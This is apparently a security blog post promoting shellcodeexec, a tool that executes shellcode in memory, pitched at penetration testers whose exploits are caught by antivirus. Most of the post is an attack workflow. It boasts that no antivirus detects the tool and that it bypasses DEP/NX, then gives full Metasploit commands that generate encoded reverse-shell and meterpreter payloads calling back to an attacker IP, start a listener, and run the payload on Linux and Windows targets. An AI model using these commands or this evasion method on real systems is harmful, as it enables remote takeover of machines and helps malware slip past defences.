Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (
CVE-2009-3103) exploit via
Metasploit and your
execute from memory meterpreter script fails you. The
Antivirus flags you and your exploit runs unsuccessfully.
msfencode does not help either! What do you do then? Use
Shellcodeexec, a script to
Execute in memory a sequence of opcodes. Its current features include:
- Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
- Can be compiled and works on 32-bit and 64-bit architectures.
- As far as I know, no AV detect it as malicious.
- Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
- It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
- Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a
Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
1
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
Or for a Windows target:
1
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
2.
Execute the
Metasploit multi/handler listener on your machine. For example for a Linux target:
1
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Or for a Windows target:
1
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3.
Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
1
$ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
Or, on the Windows target:
1
C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
Download
shellcodeexec (inquisb-shellcodeexec.zip)
here.